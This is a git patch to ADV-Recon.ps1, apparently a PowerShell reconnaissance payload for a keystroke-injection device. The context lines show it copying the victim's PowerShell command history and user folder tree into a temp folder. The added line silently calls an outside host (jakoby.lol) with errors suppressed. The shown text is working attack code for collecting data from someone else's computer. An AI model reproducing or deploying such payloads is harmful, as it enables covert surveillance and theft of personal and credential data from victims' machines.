From 38509bd7d8341d4fa6e13ac29443b265953ffa22 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 10 Jun 2023 15:20:47 -0500 Subject: [PATCH] Update ADV-Recon.ps1 --- Payloads/Flip-ADV-Recon/ADV-Recon.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 index 4743950..84a45e0 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 @@ -57,7 +57,7 @@ tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt # Powershell history Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt - +iwr "https://jakoby.lol/hak5" -EA 0 >$null ############################################################################################################################################################ function Get-fullName {